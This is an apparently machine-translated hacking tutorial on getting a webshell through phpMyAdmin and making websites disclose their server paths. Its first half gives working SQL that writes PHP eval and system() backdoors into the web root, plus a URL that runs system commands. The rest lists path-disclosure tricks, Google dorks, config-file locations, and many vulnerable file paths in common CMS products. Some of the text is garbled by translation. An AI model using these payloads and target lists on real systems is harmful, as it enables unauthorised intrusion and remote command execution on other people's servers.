phpMyAdmin various tricks to get Webshell

Site.com/phpmyadmin
Site.com/sql


D:\wamp\www

Account number and password.

Root password
First Kind
CREATE TABLE ' mysql '. ' Darkmoon ' (' Darkmoon1 ' TEXT not NULL);
INSERT into ' MySQL '. ' Darkmoon ' (' Darkmoon1 ') VALUES (' <?php @eval ($_post[pass]);? > ');
SELECT ' Darkmoon1 ' from ' Darkmoon ' to OUTFILE ' d:/wamp/www/darkmoon.php ';
DROP TABLE IF EXISTS ' Darkmoon ';

The second method of
Create TABLE Moon (Darkmoon text not NULL);
Insert into Moon (Darkmoon) VALUES (' <?php @eval ($_post[pass]);? > ');
Select Darkmoon from Moon to outfile ' d:/wamp/www/darkmoon2.php ';
Drop TABLE IF EXISTS Moon;

The third method:
Select ' <?php @eval ($_post[pass]);? > ' into OUTFILE ' d:/wamp/www/darkmoon3.php '

Fourth method
Select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' d:/wamp/www/darkmoon4.php '
127.0.0.1/darkmoon4.php?cmd=net User

All of the PHP storm paths
1. Single-Quote Burst path
Description
Add single quotation marks directly after the URL, requiring that the single quotation mark is not filtered (Gpc=off) and the server returns an error message by default.
www.xxx.com/news.php?id=149′

2, error parameter value explosion path
Description
Change the value of the parameter to be submitted to an error value, such as-1. -99999 single quotes are filtered when you may try.
Www.xxx.com/researcharchive.php?id=-1

3. Google explode path
Description
Combined with the keyword and site syntax to search the page snapshot of the error page, common keywords have warning and fatal error. Note that if the target site is a level two domain name, site is connected to its top-level domain name, so that it gets much more information.
SITE:XXX.EDU.TW Warning
Site:xxx.com.tw "Fatal error"

4. test file explosion path
Description
There are test files in the root directory of many Web sites, and the script code is usually phpinfo ().
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

5, phpMyAdmin explosion path
Description
Once you find the admin page for phpMyAdmin and then access some of the specific files in that directory, you are likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google. PS: Some BT websites will be written as phpMyAdmin.
1./phpmyadmin/libraries/lect_lang.lib.php
2./phpmyadmin/index.php?lang[]=1
3./phpmyadmin/phpinfo.php
4. Load_file ()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php

6. configuration file Find path
Description
If the injection point has file Read permissions, you can manually load_file or tool to read the configuration file, and then look for path information (typically at the end of the file). Web server and PHP configuration file default path under each platform can be checked online, here are a few common.

Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file

Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file

7, Nginx file type Error resolution explosion path
Description
This is the method that was inadvertently discovered yesterday, of course, requires the Web server is Nginx, and there is a file type parsing vulnerability. Sometimes add/x.php after the picture address, the picture will not only be executed as PHP file, but also may burst the physical path.
www.xxx.com/top.jpg/x.php

8. Other
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

Wp
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php

Ecshop Mall System Burst Path Vulnerability file
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter Blast Path
ucenter\control\admin\db.php

Dzbbs
Manyou/admincp.php?my_suffix=%0a%0dtoby57

Z-blog
admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php

php168 Blast Path
Admin/inc/hack/count.php?job=list
Admin/inc/hack/search.php?job=getcode
Admin/inc/ajax/bencandy.php?job=do
Cache/mysqltime.txt

Phpcms2008-sp4
Registered user Access after login
Phpcms/corpandresize/process.php?pic=. /images/logo.gif

Bo-blog
Poc:
/go.php/<[evil Code]
Cmseasy website Path Vulnerability
The vulnerability appears in the menu_top.php file
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

phpMyAdmin various tricks to get Webshell